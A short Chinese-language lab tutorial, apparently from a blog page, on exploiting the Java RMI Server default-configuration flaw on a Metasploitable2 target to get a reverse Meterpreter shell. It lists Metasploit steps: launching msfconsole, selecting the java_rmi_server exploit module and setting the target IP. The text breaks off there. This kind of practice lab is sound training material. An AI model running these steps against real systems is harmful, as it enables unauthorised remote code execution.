從metasploit2 linux靶機反彈meterpreter shell

Java RMI SERVER 命令執行漏洞 Java RMI Serve 的 RMI 註冊表和 RMI 激活服務的默認配置存在安全漏洞,可被利用導致代碼執行。 1.在kali中執行msfconsole,啓動metasploit 2.use exploit/multi/misc/java_rmi_server,選擇漏洞 3.set RHOST 192.168.175.130  設置要攻擊的機器IP
相關文章
相關標籤/搜索